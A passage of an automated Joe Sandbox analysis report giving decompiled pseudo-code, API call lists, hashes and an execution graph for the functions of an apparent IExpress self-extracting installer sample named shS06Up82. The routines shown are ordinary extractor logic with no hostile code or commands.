                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 003E4823
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 003E4847
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003E4851
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      • API String ID: 359063898-2356899610
                                                                                                                                                                                                      • Opcode ID: 05f8cb3ff16b903f4165fcf9d88fc4980da74be929fd593619e9657cbef2a432
                                                                                                                                                                                                      • Instruction ID: faeefeda74631cd55a5e42d187cdd5ff881f625e52187f7964b7d256b9522b0f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05f8cb3ff16b903f4165fcf9d88fc4980da74be929fd593619e9657cbef2a432
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA1106B56046D16FEB278F259C58F763B5EEB89300F058719E9828F3C1DA369C068760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E3680(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct tagMSG _v36;
                                                                                                                                                                                                      				int _t8;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                                                                      				_t16 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							if(_v36.message != 0x12) {
                                                                                                                                                                                                      								DispatchMessageA( &_v36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t16 = 1;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                      						} while (_t8 != 0);
                                                                                                                                                                                                      						if(_t16 == 0) {
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t8;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x003e368c
                                                                                                                                                                                                      0x003e368f
                                                                                                                                                                                                      0x003e3691
                                                                                                                                                                                                      0x003e369f
                                                                                                                                                                                                      0x003e36a7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e36ba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e36bc
                                                                                                                                                                                                      0x003e36bc
                                                                                                                                                                                                      0x003e36c0
                                                                                                                                                                                                      0x003e36cb
                                                                                                                                                                                                      0x003e36c2
                                                                                                                                                                                                      0x003e36c4
                                                                                                                                                                                                      0x003e36c4
                                                                                                                                                                                                      0x003e36da
                                                                                                                                                                                                      0x003e36e0
                                                                                                                                                                                                      0x003e36e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e36e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e36ba
                                                                                                                                                                                                      0x003e36ed

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003E369F
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36B2
                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 003E36CB
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36DA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2776232527-0
                                                                                                                                                                                                      • Opcode ID: d20d6c340bb21513f9284b7685a717c2aafe4fd287947ab5f6d92815c30b0515
                                                                                                                                                                                                      • Instruction ID: 446976230b3780eb12b2ccbde7098d10c50dfcb85234634078d11989fc5340d6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d20d6c340bb21513f9284b7685a717c2aafe4fd287947ab5f6d92815c30b0515
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 930184729002A4B7DB314AA75C8CEEB7B7CEB85B10F010319B905E72C0D5719640C660
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                                      			E003E65E8(char* __ecx) {
                                                                                                                                                                                                      				char _t3;
                                                                                                                                                                                                      				char _t10;
                                                                                                                                                                                                      				char* _t12;
                                                                                                                                                                                                      				char* _t14;
                                                                                                                                                                                                      				char* _t15;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                                                                      				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                      				_t10 = 0;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t3 =  *_t12;
                                                                                                                                                                                                      					_t12 =  &(_t12[1]);
                                                                                                                                                                                                      				} while (_t3 != 0);
                                                                                                                                                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                      					if(_t16 <= _t15) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *_t16 == 0x5c) {
                                                                                                                                                                                                      						L7:
                                                                                                                                                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                      							_t16 = CharNextA(_t16);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t16 = _t10;
                                                                                                                                                                                                      						_t10 = 1;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(_t16);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return _t10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *_t16 == 0x5c) {
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      0x003e65e8
                                                                                                                                                                                                      0x003e65ed
                                                                                                                                                                                                      0x003e65ef
                                                                                                                                                                                                      0x003e65f2
                                                                                                                                                                                                      0x003e65f4
                                                                                                                                                                                                      0x003e65f4
                                                                                                                                                                                                      0x003e65f6
                                                                                                                                                                                                      0x003e65f7
                                                                                                                                                                                                      0x003e6608
                                                                                                                                                                                                      0x003e6611
                                                                                                                                                                                                      0x003e6618
                                                                                                                                                                                                      0x003e661c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e660e
                                                                                                                                                                                                      0x003e6623
                                                                                                                                                                                                      0x003e6625
                                                                                                                                                                                                      0x003e663b
                                                                                                                                                                                                      0x003e663b
                                                                                                                                                                                                      0x003e663d
                                                                                                                                                                                                      0x003e6641
                                                                                                                                                                                                      0x003e6610
                                                                                                                                                                                                      0x003e6610
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6610
                                                                                                                                                                                                      0x003e6644
                                                                                                                                                                                                      0x003e6647
                                                                                                                                                                                                      0x003e6647
                                                                                                                                                                                                      0x003e6621
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,003E2B33), ref: 003E6602
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 003E6612
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 003E6629
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 003E6635
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Prev$Next
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3260447230-0
                                                                                                                                                                                                      • Opcode ID: eab203f2fb9f62c6848620436e979ce0628a41b5d9c30255b9a49835b47f026e
                                                                                                                                                                                                      • Instruction ID: a0e7a331eb366b2f1f05883e86898734f6cdfd13b1bc3003d520270768913044
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eab203f2fb9f62c6848620436e979ce0628a41b5d9c30255b9a49835b47f026e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F02D310045E06ED7331B2A4CC89BBBF9CDFE7394F1A436FE4D596081D7150D068661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E69B0() {
                                                                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                                                                      				intOrPtr* _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				 *0x3e81f8 = E003E6C70();
                                                                                                                                                                                                      				__set_app_type(E003E6FBE(2));
                                                                                                                                                                                                      				 *0x3e88a4 =  *0x3e88a4 | 0xffffffff;
                                                                                                                                                                                                      				 *0x3e88a8 =  *0x3e88a8 | 0xffffffff;
                                                                                                                                                                                                      				_t4 = __p__fmode();
                                                                                                                                                                                                      				_t11 =  *0x3e8528; // 0x0
                                                                                                                                                                                                      				 *_t4 = _t11;
                                                                                                                                                                                                      				_t5 = __p__commode();
                                                                                                                                                                                                      				_t12 =  *0x3e851c; // 0x0
                                                                                                                                                                                                      				 *_t5 = _t12;
                                                                                                                                                                                                      				_t6 = E003E7000();
                                                                                                                                                                                                      				if( *0x3e8000 == 0) {
                                                                                                                                                                                                      					__setusermatherr(E003E7000);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E003E71EF(_t6);
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x003e69b7
                                                                                                                                                                                                      0x003e69c2
                                                                                                                                                                                                      0x003e69c8
                                                                                                                                                                                                      0x003e69cf
                                                                                                                                                                                                      0x003e69d8
                                                                                                                                                                                                      0x003e69de
                                                                                                                                                                                                      0x003e69e4
                                                                                                                                                                                                      0x003e69e6
                                                                                                                                                                                                      0x003e69ec
                                                                                                                                                                                                      0x003e69f2
                                                                                                                                                                                                      0x003e69f4
                                                                                                                                                                                                      0x003e6a00
                                                                                                                                                                                                      0x003e6a07
                                                                                                                                                                                                      0x003e6a0d
                                                                                                                                                                                                      0x003e6a0e
                                                                                                                                                                                                      0x003e6a15

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 003E6FC5
                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 003E69C2
                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 003E69D8
                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 003E69E6
                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 003E6A07
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1632413811-0
                                                                                                                                                                                                      • Opcode ID: 7702c99b0caeb8733f0327b6fbcf20895ec80062d65f788f8f081894c5994c27
                                                                                                                                                                                                      • Instruction ID: 151f52186dafa072403e720cbf19d9dfb81856eeb6fea9328a888fbe53b31314
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7702c99b0caeb8733f0327b6fbcf20895ec80062d65f788f8f081894c5994c27
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AF0F8B09087D18FC777AB31ED8A6043B6AFB05321F100B19E465AE2E1CF3A95418A11
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E6952(CHAR* __ecx) {
                                                                                                                                                                                                      				long _v8;
                                                                                                                                                                                                      				long _v12;
                                                                                                                                                                                                      				long _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				_v16 = 0;
                                                                                                                                                                                                      				if( *__ecx != 0) {
                                                                                                                                                                                                      					_t6 =  &_v20; // 0x3e5760
                                                                                                                                                                                                      					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                                                                                                                                                      						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t22;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x003e695b
                                                                                                                                                                                                      0x003e6960
                                                                                                                                                                                                      0x003e6963
                                                                                                                                                                                                      0x003e6966
                                                                                                                                                                                                      0x003e6969
                                                                                                                                                                                                      0x003e696c
                                                                                                                                                                                                      0x003e6972
                                                                                                                                                                                                      0x003e6987
                                                                                                                                                                                                      0x003e699f
                                                                                                                                                                                                      0x003e699f
                                                                                                                                                                                                      0x003e6987
                                                                                                                                                                                                      0x003e69a7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W>,?,00000000,003E5760,?,A:\), ref: 003E697F
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 003E6999
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DiskFreeSpace
                                                                                                                                                                                                      • String ID: `W>
                                                                                                                                                                                                      • API String ID: 1705453755-2198717450
                                                                                                                                                                                                      • Opcode ID: 723da3a829c274cebaf179e7f918ed6f2aeb0a00b6362a625fc983e07e8dcf01
                                                                                                                                                                                                      • Instruction ID: 10ed2ecff7cec92dbfd5641e249289b89f3045a029944e7d8bc0a411aa4ba9f3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 723da3a829c274cebaf179e7f918ed6f2aeb0a00b6362a625fc983e07e8dcf01
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF0E7B6D00268BBCB12DFE98C45ADEBBBCEB48700F104696B510E6280D671AA008B91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:28.6%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:960
                                                                                                                                                                                                      Total number of Limit Nodes:25
                                                                                                                                                                                                      execution_graph 3119 e6c03 3120 e6c1e 3119->3120 3121 e6c17 _exit 3119->3121 3122 e6c27 _cexit 3120->3122 3123 e6c32 3120->3123 3121->3120 3122->3123 2196 e6f40 SetUnhandledExceptionFilter 2197 e4cc0 GlobalFree 3124 e4200 3125 e421e 3124->3125 3126 e420b SendMessageA 3124->3126 3126->3125 3127 e3100 3128 e31b0 3127->3128 3129 e3111 3127->3129 3131 e3141 3128->3131 3132 e31b9 SendDlgItemMessageA 3128->3132 3130 e311d 3129->3130 3133 e3149 GetDesktopWindow 3129->3133 3130->3131 3134 e3138 EndDialog 3130->3134 3132->3131 3137 e43d0 6 API calls 3133->3137 3134->3131 3139 e4463 SetWindowPos 3137->3139 3140 e6ce0 4 API calls 3139->3140 3141 e315d 6 API calls 3140->3141 3141->3131 3142 e4bc0 3143 e4c05 3142->3143 3145 e4bd7 3142->3145 3144 e4c1b SetFilePointer 3143->3144 3143->3145 3144->3145 3146 e30c0 3147 e30de CallWindowProcA 3146->3147 3148 e30ce 3146->3148 3149 e30da 3147->3149 3148->3147 3148->3149 3150 e63c0 3151 e6407 3150->3151 3152 e658a CharPrevA 3151->3152 3153 e6415 CreateFileA 3152->3153 3154 e643a 3153->3154 3155 e6448 WriteFile 3153->3155 3158 e6ce0 4 API calls 3154->3158 3156 e6465 CloseHandle 3155->3156 3156->3154 3159 e648f 3158->3159 2198 e4ad0 2206 e3680 2198->2206 2201 e4aee WriteFile 2203 e4b0f 2201->2203 2204 e4b14 2201->2204 2202 e4ae9 2204->2203 2205 e4b3b SendDlgItemMessageA 2204->2205 2205->2203 2207 e3691 MsgWaitForMultipleObjects 2206->2207 2208 e36e8 2207->2208 2209 e36a9 PeekMessageA 2207->2209 2208->2201 2208->2202 2209->2207 2210 e36bc 2209->2210 2210->2207 2210->2208 2211 e36c7 DispatchMessageA 2210->2211 2212 e36d1 PeekMessageA 2210->2212 2211->2212 2212->2210 2213 e4cd0 2214 e4d0b 2213->2214 2215 e4cf4 2213->2215 2216 e4d02 2214->2216 2219 e4dcb 2214->2219 2222 e4d25 2214->2222 2215->2216 2217 e4b60 FindCloseChangeNotification 2215->2217 2270 e6ce0 2216->2270 2217->2216 2220 e4dd4 SetDlgItemTextA 2219->2220 2223 e4de3 2219->2223 2220->2223 2221 e4e95 2222->2216 2236 e4c37 2222->2236 2223->2216 2244 e476d 2223->2244 2227 e4e38 2227->2216 2253 e4980 2227->2253 2232 e4e64 2261 e47e0 LocalAlloc 2232->2261 2235 e4e6f 2235->2216 2237 e4c4c DosDateTimeToFileTime 2236->2237 2239 e4c88 2236->2239 2238 e4c5e LocalFileTimeToFileTime 2237->2238 2237->2239 2238->2239 2240 e4c70 SetFileTime 2238->2240 2239->2216 2241 e4b60 2239->2241 2240->2239 2242 e4b76 SetFileAttributesA 2241->2242 2243 e4b92 FindCloseChangeNotification 2241->2243 2242->2216 2243->2242 2275 e66ae GetFileAttributesA 2244->2275 2246 e477b 2246->2227 2247 e47cc SetFileAttributesA 2248 e47db 2247->2248 2248->2227 2252 e47c2 2252->2247 2254 e4990 2253->2254 2255 e49a5 2254->2255 2256 e49c2 lstrcmpA 2254->2256 2259 e44b9 20 API calls 2255->2259 2257 e4a0e 2256->2257 2258 e49ba 2256->2258 2257->2258 2341 e487a 2257->2341 2258->2216 2258->2232 2259->2258 2262 e480f LocalAlloc 2261->2262 2263 e47f6 2261->2263 2265 e480b 2262->2265 2267 e4831 2262->2267 2264 e44b9 20 API calls 2263->2264 2264->2265 2265->2235 2268 e44b9 20 API calls 2267->2268 2269 e4846 LocalFree 2268->2269 2269->2265 2271 e6ceb 2270->2271 2272 e6ce8 2270->2272 2354 e6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2271->2354 2272->2221 2274 e6e26 2274->2221 2276 e4777 2275->2276 2276->2246 2276->2247 2277 e6517 FindResourceA 2276->2277 2278 e656b 2277->2278 2279 e6536 LoadResource 2277->2279 2284 e44b9 2278->2284 2279->2278 2280 e6544 DialogBoxIndirectParamA FreeResource 2279->2280 2280->2278 2282 e47b1 2280->2282 2282->2247 2282->2248 2282->2252 2285 e44fe LoadStringA 2284->2285 2286 e455a 2284->2286 2287 e4527 2285->2287 2288 e4562 2285->2288 2290 e6ce0 4 API calls 2286->2290 2289 e681f 10 API calls 2287->2289 2294 e45c9 2288->2294 2299 e457e 2288->2299 2291 e452c 2289->2291 2292 e4689 2290->2292 2293 e4536 MessageBoxA 2291->2293 2325 e67c9 2291->2325 2292->2282 2293->2286 2296 e45cd LocalAlloc 2294->2296 2297 e4607 LocalAlloc 2294->2297 2296->2286 2302 e45f3 2296->2302 2297->2286 2309 e45c4 2297->2309 2299->2299 2301 e4596 LocalAlloc 2299->2301 2301->2286 2305 e45af 2301->2305 2306 e171e _vsnprintf 2302->2306 2303 e462d MessageBeep 2313 e681f 2303->2313 2331 e171e 2305->2331 2306->2309 2309->2303 2310 e67c9 EnumResourceLanguagesA 2312 e4645 MessageBoxA LocalFree 2310->2312 2312->2286 2314 e6857 GetVersionExA 2313->2314 2315 e6940 2313->2315 2318 e687c 2314->2318 2324 e691a 2314->2324 2316 e6ce0 4 API calls 2315->2316 2317 e463b 2316->2317 2317->2310 2317->2312 2319 e68a5 GetSystemMetrics 2318->2319 2318->2324 2320 e68b5 RegOpenKeyExA 2319->2320 2319->2324 2321 e68d6 RegQueryValueExA RegCloseKey 2320->2321 2320->2324 2322 e690c 2321->2322 2321->2324 2335 e66f9 2322->2335 2324->2315 2326 e6803 2325->2326 2327 e67e2 2325->2327 2326->2293 2339 e6793 EnumResourceLanguagesA 2327->2339 2329 e67f5 2329->2326 2340 e6793 EnumResourceLanguagesA 2329->2340 2332 e172d 2331->2332 2333 e173d _vsnprintf 2332->2333 2334 e175d 2332->2334 2333->2334 2334->2309 2336 e670f 2335->2336 2337 e6740 CharNextA 2336->2337 2338 e674b 2336->2338 2337->2336 2338->2324 2339->2329 2340->2326 2342 e48a2 CreateFileA 2341->2342 2344 e4908 2342->2344 2345 e48e9 2342->2345 2344->2258 2345->2344 2346 e48ee 2345->2346 2349 e490c 2346->2349 2350 e48f5 CreateFileA 2349->2350 2352 e4917 2349->2352 2350->2344 2351 e4962 CharNextA 2351->2352 2352->2350 2352->2351 2353 e4953 CreateDirectoryA 2352->2353 2353->2351 2354->2274 3160 e3210 3161 e328e EndDialog 3160->3161 3162 e3227 3160->3162 3177 e3239 3161->3177 3163 e3235 3162->3163 3164 e33e2 GetDesktopWindow 3162->3164 3168 e324c 3163->3168 3169 e32dd GetDlgItemTextA 3163->3169 3163->3177 3166 e43d0 11 API calls 3164->3166 3167 e33f1 SetWindowTextA SendDlgItemMessageA 3166->3167 3170 e341f GetDlgItem EnableWindow 3167->3170 3167->3177 3171 e32c5 EndDialog 3168->3171 3172 e3251 3168->3172 3178 e32fc 3169->3178 3193 e3366 3169->3193 3170->3177 3171->3177 3173 e325c LoadStringA 3172->3173 3172->3177 3174 e327b 3173->3174 3175 e3294 3173->3175 3181 e44b9 20 API calls 3174->3181 3198 e4224 LoadLibraryA 3175->3198 3176 e44b9 20 API calls 3176->3177 3180 e3331 GetFileAttributesA 3178->3180 3178->3193 3183 e333f 3180->3183 3184 e337c 3180->3184 3181->3161 3187 e44b9 20 API calls 3183->3187 3186 e658a CharPrevA 3184->3186 3185 e32a5 SetDlgItemTextA 3185->3174 3185->3177 3188 e338d 3186->3188 3189 e3351 3187->3189 3190 e58c8 27 API calls 3188->3190 3189->3177 3191 e335a CreateDirectoryA 3189->3191 3192 e3394 3190->3192 3191->3184 3191->3193 3192->3193 3194 e33a4 3192->3194 3193->3176 3195 e33c7 EndDialog 3194->3195 3196 e597d 34 API calls 3194->3196 3195->3177 3197 e33c3 3196->3197 3197->3177 3197->3195 3199 e4246 GetProcAddress 3198->3199 3200 e43b2 3198->3200 3201 e425d GetProcAddress 3199->3201 3202 e43a4 FreeLibrary 3199->3202 3204 e44b9 20 API calls 3200->3204 3201->3202 3203 e4274 GetProcAddress 3201->3203 3202->3200 3203->3202 3205 e428b 3203->3205 3206 e329d 3204->3206 3207 e4295 GetTempPathA 3205->3207 3211 e42e1 3205->3211 3206->3177 3206->3185 3208 e42ad 3207->3208 3208->3208 3209 e42b4 CharPrevA 3208->3209 3210 e42d0 CharPrevA 3209->3210 3209->3211 3210->3211 3212 e4390 FreeLibrary 3211->3212 3212->3206 3213 e4a50 3214 e4a9f ReadFile 3213->3214 3216 e4a66 3213->3216 3217 e4abb 3214->3217 3215 e4a82 memcpy 3215->3217 3216->3215 3216->3217 3218 e3450 3219 e345e 3218->3219 3220 e34d3 EndDialog 3218->3220 3222 e349a GetDesktopWindow 3219->3222 3223 e3465 3219->3223 3221 e346a 3220->3221 3224 e43d0 11 API calls 3222->3224 3223->3221 3226 e348c EndDialog 3223->3226 3225 e34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3224->3225 3225->3221 3226->3221 3227 e6bef _XcptFilter 2355 e4ca0 GlobalAlloc 2356 e6a60 2373 e7155 2356->2373 2358 e6a65 2359 e6a76 GetStartupInfoW 2358->2359 2360 e6a93 2359->2360 2361 e6aa8 2360->2361 2362 e6aaf Sleep 2360->2362 2363 e6ac7 _amsg_exit 2361->2363 2365 e6ad1 2361->2365 2362->2360 2363->2365 2364 e6b13 _initterm 2366 e6b2e __IsNonwritableInCurrentImage 